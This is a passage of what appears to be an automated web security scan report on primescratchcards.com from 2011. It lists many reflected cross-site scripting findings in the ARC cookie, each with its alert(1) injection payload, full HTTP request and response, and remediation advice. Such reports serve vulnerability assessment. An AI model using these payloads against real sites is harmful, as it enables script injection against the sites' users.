...[SNIP]...
<input type=hidden name ="AR" value ="13013711f92--><script>alert(1)</script>092fca28c0d">
...[SNIP]...

3.117. http://primescratchcards.com/images/bg.jpg [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/bg.jpg

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3566c"%3balert(1)//052f6e6caae was submitted in the ARC cookie. This input was echoed as 3566c";alert(1)//052f6e6caae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bg.jpg HTTP/1.1
Host: primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=1301373566c"%3balert(1)//052f6e6caae

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:42:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301373566c%22%3Balert%281%29%2F%2F052f6e6caae; expires=Tue, 15-May-2012 11:42:00 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=NJMOLGNDOCCNBEMDLFHPBAKN; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301373566c";alert(1)//052f6e6caae' border='0' width='1' height='1'>
...[SNIP]...

3.118. http://primescratchcards.com/images/contactus.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/contactus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f815d"%3balert(1)//a08662a17ad was submitted in the ARC cookie. This input was echoed as f815d";alert(1)//a08662a17ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/contactus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137f815d"%3balert(1)//a08662a17ad; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137f815d%22%3Balert%281%29%2F%2Fa08662a17ad; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137f815d";alert(1)//a08662a17ad' border='0' width='1' height='1'>
...[SNIP]...

3.119. http://primescratchcards.com/images/contactus.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/contactus.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 63c7a--><script>alert(1)</script>78f7646a362 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/contactus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013763c7a--><script>alert(1)</script>78f7646a362; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=13013763c7a%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E78f7646a362; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="13013763c7a--><script>alert(1)</script>78f7646a362">
...[SNIP]...

3.120. http://primescratchcards.com/images/contactus.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/contactus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bef4'%3balert(1)//6be503d7a62 was submitted in the ARC cookie. This input was echoed as 5bef4';alert(1)//6be503d7a62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/contactus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301375bef4'%3balert(1)//6be503d7a62; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301375bef4%27%3Balert%281%29%2F%2F6be503d7a62; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301375bef4';alert(1)//6be503d7a62&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.121. http://primescratchcards.com/images/fairplay.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/fairplay.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f253"%3balert(1)//b5a37874c72 was submitted in the ARC cookie. This input was echoed as 4f253";alert(1)//b5a37874c72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/fairplay.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374f253"%3balert(1)//b5a37874c72; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301374f253%22%3Balert%281%29%2F%2Fb5a37874c72; expires=Tue, 15-May-2012 12:38:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301374f253";alert(1)//b5a37874c72' border='0' width='1' height='1'>
...[SNIP]...

3.122. http://primescratchcards.com/images/fairplay.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/fairplay.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f04e'%3balert(1)//09abbe83f8b was submitted in the ARC cookie. This input was echoed as 6f04e';alert(1)//09abbe83f8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/fairplay.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301376f04e'%3balert(1)//09abbe83f8b; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301376f04e%27%3Balert%281%29%2F%2F09abbe83f8b; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301376f04e';alert(1)//09abbe83f8b&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.123. http://primescratchcards.com/images/fairplay.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/fairplay.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 4836b--><script>alert(1)</script>825bfb200be was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/fairplay.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374836b--><script>alert(1)</script>825bfb200be; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=1301374836b%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E825bfb200be; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301374836b--><script>alert(1)</script>825bfb200be">
...[SNIP]...

3.124. http://primescratchcards.com/images/help.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/help.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8db1"%3balert(1)//e159452f354 was submitted in the ARC cookie. This input was echoed as a8db1";alert(1)//e159452f354 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/help.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137a8db1"%3balert(1)//e159452f354; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137a8db1%22%3Balert%281%29%2F%2Fe159452f354; expires=Tue, 15-May-2012 12:38:24 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137a8db1";alert(1)//e159452f354' border='0' width='1' height='1'>
...[SNIP]...

3.125. http://primescratchcards.com/images/help.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/help.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 792f9--><script>alert(1)</script>6e1becf961c was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/help.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137792f9--><script>alert(1)</script>6e1becf961c; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137792f9%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6e1becf961c; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137792f9--><script>alert(1)</script>6e1becf961c">
...[SNIP]...

3.126. http://primescratchcards.com/images/help.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/help.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18010'%3balert(1)//6d6871f8cf2 was submitted in the ARC cookie. This input was echoed as 18010';alert(1)//6d6871f8cf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/help.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013718010'%3balert(1)//6d6871f8cf2; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013718010%27%3Balert%281%29%2F%2F6d6871f8cf2; expires=Tue, 15-May-2012 12:38:24 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=13013718010';alert(1)//6d6871f8cf2&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.127. http://primescratchcards.com/images/index.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/index.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2d8c'%3balert(1)//103ff68b225 was submitted in the ARC cookie. This input was echoed as c2d8c';alert(1)//103ff68b225 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/index.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137c2d8c'%3balert(1)//103ff68b225; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137c2d8c%27%3Balert%281%29%2F%2F103ff68b225; expires=Tue, 15-May-2012 12:38:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137c2d8c';alert(1)//103ff68b225&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.128. http://primescratchcards.com/images/index.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/index.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5f1a"%3balert(1)//c43ea638988 was submitted in the ARC cookie. This input was echoed as f5f1a";alert(1)//c43ea638988 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/index.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137f5f1a"%3balert(1)//c43ea638988; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:09 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137f5f1a%22%3Balert%281%29%2F%2Fc43ea638988; expires=Tue, 15-May-2012 12:38:08 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137f5f1a";alert(1)//c43ea638988' border='0' width='1' height='1'>
...[SNIP]...

3.129. http://primescratchcards.com/images/index.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/index.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload bdc95--><script>alert(1)</script>eea9fa94cc6 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/index.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137bdc95--><script>alert(1)</script>eea9fa94cc6; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137bdc95%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eeea9fa94cc6; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137bdc95--><script>alert(1)</script>eea9fa94cc6">
...[SNIP]...

3.130. http://primescratchcards.com/images/media.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/media.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59f27"%3balert(1)//e1dbe20273c was submitted in the ARC cookie. This input was echoed as 59f27";alert(1)//e1dbe20273c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/media.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013759f27"%3balert(1)//e1dbe20273c; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
